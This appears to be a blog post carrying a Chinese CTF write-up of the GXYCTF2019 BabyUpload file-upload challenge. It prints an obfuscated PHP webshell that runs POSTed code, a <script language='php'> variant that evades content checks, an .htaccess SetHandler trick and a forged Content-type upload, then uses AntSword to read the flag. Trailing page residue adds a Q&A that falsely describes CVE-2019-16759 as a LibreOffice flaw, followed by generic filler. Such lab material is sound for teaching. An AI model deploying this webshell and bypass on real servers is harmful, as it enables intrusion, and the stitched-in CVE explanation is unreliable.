[GXYCTF2019]BabyUpload1 -- 题目分析与详解

目录

一、题目分析

1、判断题目类型:

2、上传不同类型的文件进行测试:

二、题目详解

1、写出.htaccess文件:

2、.htaccess 文件配合 .jpg 上传:

3、利用 中国蚁剑/中国菜刀 获取flag:


一、题目分析

1、判断题目类型:

打开靶机,进入靶场,页面如图所示:

判断题目类型为:文件上传漏洞类型。

2、上传不同类型的文件进行测试:

(1)首先上传一句话木马 test.php,代码如下:

<?php
	$a="a"."s";
	$b="s"."e"."rt";
	$c=$a.$b;
	$c($_POST['cmd']);
?>

代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。

上传后页面如下图:

 

由此我们得知,文件后缀不可以有ph,那么php3,php5,phtml等后缀自然无法使用了。

(2)将文件后缀改为 jpg,上传后页面如下图:

由此我们得知,后端检测出我们的.jpg文件中含有php代码。

那么我们将.jpg文件中的php代码修改为 javascript 的形式,代码如下:

<script language='php'>
    $a = "a"."s";
    $b = "s"."e"."r"."t";
    $c = $a.$b;
    $c($_POST["003946ghs"]);
</script>

上传文件,返回页面如下:

我们发现上传成功,接下来只需要能够解析.jpg文件中的php代码就OK了。

解析.jpg文件中的php代码,我们可以使用.htaccess文件来进行实现。


二、题目详解

1、写出.htaccess文件:

新建一个名为 .htaccess 文件,并使用 VS / 记事本打开。

写入以下代码:

SetHandler application/x-httpd-php

这条命令可以解析所有后缀文件中的 php 代码。

2、.htaccess 文件配合 .jpg 上传:

先上传 .htaccess 文件,响应页面如下:

由此我们得知,后端代码对文件类型--Content-type有限制。

所以我们在上传 .htaccess 文件的同时,利用Burpsuite进行抓包,修改 Content-type为image/jpeg。

抓包界面如下:

发包上传,响应界面如下:

页面提示我们上传成功 (.htaccess successfully uploaded)。 

.htaccess 文件上传成功后,我们上传 .jpg 文件,响应界面如下:

页面提示我们也上传成功 (.htaccess successfully uploaded)。

且通过页面回显信息,我们可以拼接出网址,如下:

3、利用 中国蚁剑/中国菜刀 获取flag:

打开蚁剑,添加数据,将我们方才拼接好的网址复制过来,并输入一句话木马连接密码,编码器选择 base64,界面如下:

测试连接,发现连接成功:

添加数据,打开,在根目录下找到flag:

拿到flag值:

提交--正确。

  • 9
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: 这个问题我可以回答。CVE-2019-16759漏洞是LibreOffice软件中的一个漏洞,攻击者可以利用该漏洞通过特制的ODF文档文件来执行任意代码。该漏洞的原理是由于LibreOffice在处理ODF文档时,没有正确地验证文档中的宏代码,导致攻击者可以通过恶意代码来执行任意命令。该漏洞已经被修复,建议用户及时更新软件版本。 ### 回答2: CVE-2019-16759是一个存在于某个软件或系统中的安全漏洞。该漏洞具体的原理是指某个软件或系统的设计或实现过程中存在的缺陷,使得攻击者可以利用这个缺陷来执行恶意操作。 对于CVE-2019-16759漏洞而言,具体的原理可以分为以下几个方面进行解析。 首先,CVE-2019-16759漏洞可能涉及到软件或系统中的某个输入验证机制存在问题。在正常的运行过程中,软件或系统需要接受用户的输入,并对输入进行验证,以确保输入的合法性。然而,由于软件或系统在输入验证方面存在缺陷,攻击者可以发送恶意输入来绕过验证过程,从而导致安全漏洞的产生。 其次,CVE-2019-16759漏洞可能与某个安全控制机制的问题有关。安全控制机制是指软件或系统中用于限制用户权限和保护敏感数据的一系列规则和方法。然而,由于软件或系统在安全控制方面存在漏洞,攻击者可以绕过控制机制,获取未经授权的访问权限或窃取敏感数据。 第三,CVE-2019-16759漏洞可能涉及到软件或系统中的某个错误处理机制存在问题。在软件或系统的运行过程中,会出现各种错误和异常情况,需要有相应的处理机制来处理这些问题。然而,由于软件或系统在错误处理方面存在缺陷,攻击者可以利用这些错误和异常情况来执行恶意操作,进而导致安全漏洞的产生。 总之,CVE-2019-16759漏洞的原理可以归结为输入验证机制的问题、安全控制机制的问题和错误处理机制的问题等方面。攻击者可以利用这些缺陷来绕过验证、获取未经授权的权限或窃取敏感数据,从而导致软件或系统的安全性受到威胁。为了解决该漏洞,开发者或维护者需要修复相关的软件或系统,增强输入验证、安全控制和错误处理等方面的能力,确保软件或系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值